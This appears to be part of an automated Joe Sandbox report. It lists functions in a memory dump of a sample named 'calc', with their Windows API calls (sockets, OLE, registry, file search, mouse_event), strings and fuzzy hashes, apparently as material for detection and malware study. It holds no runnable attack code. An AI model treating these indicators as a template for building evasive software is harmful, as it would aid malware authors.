Instruction Fuzzy Hash: E8319372C4022C9ADB20E7A0CC89EDB77BCAB19314F0405D7E519D2141EA399BC88F55

Function 00430B6B Relevance: 7.7, APIs: 5, Instructions: 226comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00430BCF
CreateBindCtx.OLE32(00000000,?), ref: 00430C6D
MkParseDisplayName.OLE32(?,00000000,?,?), ref: 00430CA2
CLSIDFromProgID.COMBASE(00000000,?), ref: 00430D3B
GetActiveObject.OLEAUT32(?,00000000,?), ref: 00430D5F

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ActiveBindCreateDisplayFromInitializeNameObjectParseProg
String ID:
API String ID: 2624060339-0
Opcode ID: 78d98e9ef6012a7890a48b1e667d53dffbd1682f643dec9bf68f0a9dbe00c454
Instruction ID: da78810dc58ee67beca8740cb072a36e8d7e879c082b736ce8f307c953f0df69
Opcode Fuzzy Hash: 78d98e9ef6012a7890a48b1e667d53dffbd1682f643dec9bf68f0a9dbe00c454
Instruction Fuzzy Hash: D1713671900209AFDF04EBE1DC94CEEBBB9EF48358F10566AF401AB121DB39AD45CB58

Function 0042F9C7 Relevance: 7.6, APIs: 5, Instructions: 122networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 0042FA27
WSAGetLastError.WS2_32(00000000,00000002,00000002,00000011,?,?,00000000,00000000), ref: 0042FA44
bind.WS2_32(000000FF,?,00000010), ref: 0042FA5E
WSAGetLastError.WS2_32(00000000,000000FF,?,00000010,00000002,00000002,00000011,?,?,00000000,00000000), ref: 0042FA6A
closesocket.WS2_32(000000FF), ref: 0042FA7C

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ErrorLast$bindclosesocketsocket
String ID:
API String ID: 2609815416-0
Opcode ID: e7397f1c144a3e631e766c81722d41783a29369c490b2386a7dce95c5e9ce37f
Instruction ID: 3a16f63b51b195d841c79802276cd2fb353c8446d2eaf561272c81bd1857b55e
Opcode Fuzzy Hash: e7397f1c144a3e631e766c81722d41783a29369c490b2386a7dce95c5e9ce37f
Instruction Fuzzy Hash: 1F41DA31700224ABDB10FB65D842ADDB774AF00368F90427FF915A7292CB78ED858788

Function 00440FF0 Relevance: 7.6, APIs: 5, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0043F161: IsWindow.USER32(00000000), ref: 0043F18E

IsWindowVisible.USER32(?), ref: 00441030
IsWindowEnabled.USER32(?), ref: 0044103E
GetForegroundWindow.USER32 ref: 0044104B
IsIconic.USER32(?), ref: 00441059
IsZoomed.USER32(?), ref: 00441067

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 823c9779afd878d97ecc99f1b56ef9ecf8a7d526435fc575a642dec1e6f9dd48
Instruction ID: 5347e6eeee2c35e3a3080e83de1525a4242f8176f48fdc4335f36dcb23dbdd43
Opcode Fuzzy Hash: 823c9779afd878d97ecc99f1b56ef9ecf8a7d526435fc575a642dec1e6f9dd48
Instruction Fuzzy Hash: 71019232701210ABF7216BAA6C8576B6358AF45755F04002BF905E7262CB5CDC8586AD

Function 00454555 Relevance: 7.5, APIs: 5, Instructions: 32timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00454570
GetCurrentProcessId.KERNEL32 ref: 0045457C
GetCurrentThreadId.KERNEL32 ref: 00454584
GetTickCount.KERNEL32 ref: 0045458C
QueryPerformanceCounter.KERNEL32(?), ref: 00454598

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: ce49a519204e3efa3a38d4ccfecad025a25cbb3f5171558189020a5d7d08fa74
Instruction ID: cce3aeb063afa98f1ec8b005d038f7efac3a4b28e447dbd033245065016be6b7
Opcode Fuzzy Hash: ce49a519204e3efa3a38d4ccfecad025a25cbb3f5171558189020a5d7d08fa74
Instruction Fuzzy Hash: 74F0A471C00215EBCB20ABB4ED4859E77F4FB58246F851561ED01EB151E634DE44CBD9

Function 004240D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004240E5
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 00424183
FreeLibrary.KERNEL32(?), ref: 004241D9

Strings

su, xrefs: 004241D9

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Free$DiskErrorLibraryModeSpace
String ID: su
API String ID: 196386347-45427494
Opcode ID: ec9e2a6431ef558222c43363077eb0374d7a6db46bcaa8f577a68fa7ac60255b
Instruction ID: b200f007bc7906c09fc1daa9ee030b72ce8bb0e7a5c992d7f6e88266f231a153
Opcode Fuzzy Hash: ec9e2a6431ef558222c43363077eb0374d7a6db46bcaa8f577a68fa7ac60255b
Instruction Fuzzy Hash: FD318E31A00528EBCF04EF95EC448EEBBB8FF94310B41416BF901A7161DB38AD91CB99

Function 00415D53 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 00414513: RegOpenKeyExW.ADVAPI32(00000004,0045DC34,00000000,00000001,?,?,?,?,004371E3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,ProgramFilesDir,00000104,%.3d,?,?), ref: 00414532
Part of subcall function 00414513: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,-0000076C,?,?,004371E3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,ProgramFilesDir,00000104,%.3d,?,?), ref: 00414549
Part of subcall function 00414513: RegCloseKey.ADVAPI32(?,?,?,004371E3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,ProgramFilesDir,00000104,%.3d,?,?,-0000076C,?,0045DC34,00000004,?), ref: 0041455A

mouse_event.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00415DC9

Strings

1, xrefs: 00415DB3
SwapMouseButtons, xrefs: 00415D66
Control Panel\Mouse, xrefs: 00415D6B

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CloseOpenQueryValuemouse_event
String ID: 1$Control Panel\Mouse$SwapMouseButtons
API String ID: 3120867179-1333076132
Opcode ID: 4397a220816a50afef8ed950c651321602ee1f04abf46bd2a497226114d5da3a
Instruction ID: 64686344fb700abdcb6185f0ad728c85fdaca3d4a8d255f7137e8337f52e2b96
Opcode Fuzzy Hash: 4397a220816a50afef8ed950c651321602ee1f04abf46bd2a497226114d5da3a
Instruction Fuzzy Hash: 3A012BB6B50700FEE3101670ACCAFFB215CE780359F24853BBB12D10C2E1E84EC58129

Function 00441961 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__time32.LIBCMT ref: 00441976

Part of subcall function 0044B9D2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00442B13,00000000,00000001,?,?,00000000,?,?,00442BE4,00442E41,00000001,?), ref: 0044B9DB
Part of subcall function 0044B9D2: __aulldiv.LIBCMT ref: 0044B9FB

Strings

0zG, xrefs: 0044196D
XzG, xrefs: 0044198B

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time32
String ID: 0zG$XzG
API String ID: 946151114-99799804
Opcode ID: 0a5a7a05a70f3a69a59080a7637f812f2389dac8b37ab6b771aeb470bcc81c72
Instruction ID: 783faa91bd414bdfaf2ef5467989aa4ddd3d2fe93f43507dbe2697d40eb1a71c
Opcode Fuzzy Hash: 0a5a7a05a70f3a69a59080a7637f812f2389dac8b37ab6b771aeb470bcc81c72
Instruction Fuzzy Hash: 6321B3732147058FE728CF65D8D069BB3E2FBC8310F218A7DD29543340C7B5A9458B98

Function 00425838 Relevance: 4.6, APIs: 3, Instructions: 117fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00425866
FindNextFileW.KERNEL32(00000000,?), ref: 004258B2
FindClose.KERNEL32(00000000,000000FF,00000000), ref: 004258D2

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: b4086b0004da9266bd89cc4c01b358ffc22e49f7f88f5f165af3cf6b422538bf
Instruction ID: 387268721af71cf1c6543a3d80bd9fbe587f0a90bbb93b6ddb93adfe5e295de9
Opcode Fuzzy Hash: b4086b0004da9266bd89cc4c01b358ffc22e49f7f88f5f165af3cf6b422538bf
Instruction Fuzzy Hash: 2931B271700624AFDB14FF69EC44AAE73A8AF95324F5100ABF405DB2A1DB78DD848B58

Function 00414E16 Relevance: 4.5, APIs: 3, Instructions: 21fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(004102DA), ref: 00414E22
FindFirstFileW.KERNEL32(004102DA,?), ref: 00414E37
FindClose.KERNEL32(00000000), ref: 00414E47

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 09d9633bee1d13ec756f5857c6e115d2227fef6d1876f1372ecb636deebfb824
Instruction ID: d6754715d604e333232b506108b618bc4b0216c56dbbe0cb7bf54d6593a8388b
Opcode Fuzzy Hash: 09d9633bee1d13ec756f5857c6e115d2227fef6d1876f1372ecb636deebfb824
Instruction Fuzzy Hash: C6E04F30500A19DBDF105F34EC8C5D93BA9BB44326F004360F529D11E0D734DD805A48

Function 00444317 Relevance: 3.8, Strings: 1, Instructions: 2537COMMON

Download Yara Rule

Strings

DEFINE, xrefs: 0044481F

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID:
String ID: DEFINE
API String ID: 0-476076250
Opcode ID: 4cd9f22dd4d8e7a1e77560c9528b965c59038797c3e1a5821d6ad4ad87d6940d
Instruction ID: 7aecf970a3a8e93d399c44997cf67bf7929d5b2573a6a00c81d727fb5452ea2e
Opcode Fuzzy Hash: 4cd9f22dd4d8e7a1e77560c9528b965c59038797c3e1a5821d6ad4ad87d6940d
Instruction Fuzzy Hash: 9623C270904689CFEF29CF28C8847AA7BE1BF56314F18425BEC9587382D379D845CB99

Function 00442AF9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

__time32.LIBCMT ref: 00442B0E

Part of subcall function 0044B9D2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00442B13,00000000,00000001,?,?,00000000,?,?,00442BE4,00442E41,00000001,?), ref: 0044B9DB
Part of subcall function 0044B9D2: __aulldiv.LIBCMT ref: 0044B9FB

Strings

+D, xrefs: 00442B69, 00442BA5

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time32
String ID: +D
API String ID: 946151114-3824217212
Opcode ID: eb6d8e38119604e5ecbc05b95a4c0e3d0631e116cc63d23bbe6006d2fa1c343e
Instruction ID: 3f4e2e8da5fcfa9112af9d4ed207b4293ac1f413c7f7c23dbf4774f4b5517054
Opcode Fuzzy Hash: eb6d8e38119604e5ecbc05b95a4c0e3d0631e116cc63d23bbe6006d2fa1c343e
Instruction Fuzzy Hash: 132160B27057058FF728CE26D8C169AB3E2FBC8310F10CA7DE59547349DBB5A9098B94

Function 00421E0D Relevance: 3.3, APIs: 2, Instructions: 273COMMON

Download Yara Rule

APIs

WritePrivateProfileSectionW.KERNEL32(00000000,00000004,?), ref: 004220D9
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 004220EF

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: PrivateProfileWrite$SectionString
String ID:
API String ID: 1636597714-0
Opcode ID: 2fe0590e1bec297b2b53efcd2bcb54b23a2b77e32fabf4889c7636eb03f93f4c
Instruction ID: 41e22bb6b735dafa583f05a5a75da0cc7ce4db423ea27564a8c965bf69171114
Opcode Fuzzy Hash: 2fe0590e1bec297b2b53efcd2bcb54b23a2b77e32fabf4889c7636eb03f93f4c
Instruction Fuzzy Hash: B891A331A00224DBDF14EF65D8815AEB3B0EF14354B5640ABED469B262E77CDD82CB89

Function 0042320D Relevance: 3.0, APIs: 2, Instructions: 46fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 0042323A
FindClose.KERNEL32(00000000), ref: 0042325E

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 7770723f4f9b996c252b264d8fe0422cad5cd13d76bb5b2bdba4b77e072fc959
Instruction ID: c4933798ba476dde919d29639dc325125ccc6a047a15631857b1ceac9a992607
Opcode Fuzzy Hash: 7770723f4f9b996c252b264d8fe0422cad5cd13d76bb5b2bdba4b77e072fc959
Instruction Fuzzy Hash: BA01AC35600124EFDB04EFB4EC49A9A7368EF04315F45459BF515E7151DB7CED408BA8

Function 0041FE6D Relevance: 3.0, APIs: 2, Instructions: 15windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,0047C7A0,00000FFF,00000000,00430AD3), ref: 0041FE82
FormatMessageW.KERNEL32(00001000,00000000,0047C7A0,00000000,0047C7A0,00000FFF,00000000,00430AD3), ref: 0041FE96

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: dd82efffa5ef5c9c6af22be833fc05ef6f0753360673561712eceafa60732e9f
Instruction ID: c2c8ca3dea8f0c5a38abd3087de055dd5e24164f276729080913858088cce966
Opcode Fuzzy Hash: dd82efffa5ef5c9c6af22be833fc05ef6f0753360673561712eceafa60732e9f
Instruction Fuzzy Hash: 0FD0A7342C8303FFF33017648D0AF5A35105F48F23F508635B356A81E58BA44C45DA2E

Function 00448776 Relevance: 1.9, Strings: 1, Instructions: 611COMMON

Download Yara Rule

Strings

ERCP, xrefs: 0044885C

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID:
String ID: ERCP
API String ID: 0-1384759551
Opcode ID: 479f377b880dda84ea853ff97b5a5ff1585bee0e9e78e8026ae9ae4123f2b462
Instruction ID: 654fd696aad107bd195fdfe68b57e88e12f3403e69378b9dca93805a73d838bf
Opcode Fuzzy Hash: 479f377b880dda84ea853ff97b5a5ff1585bee0e9e78e8026ae9ae4123f2b462
Instruction Fuzzy Hash: EF329DB19016599FEF24CF68C8806AD7BB1BF45304F28422FE865E7391DB78D881CB59

Function 00450F74 Relevance: 1.7, APIs: 1, Instructions: 246COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(?,00000000,00000001,?,00000000,0000FFFF,00000000,?,004515D4,?,?,00000008,0044BBEC,?,?), ref: 00451169

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f29f5f1e06620f11fdf18836ee7d66135a7f06a95b8ce2653fe6971efe1d0d26
Instruction ID: 2d1a639c7c72d4963f71cf90ae7f89567825e216aa2bbda0b33cc7afab0cf17d
Opcode Fuzzy Hash: f29f5f1e06620f11fdf18836ee7d66135a7f06a95b8ce2653fe6971efe1d0d26
Instruction Fuzzy Hash: 05A18B311106449FD71CCF18C496B657BE0FF08352F19869EED9A8B2F2C738A985CB44

Function 004558FF Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000006), ref: 00455921

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

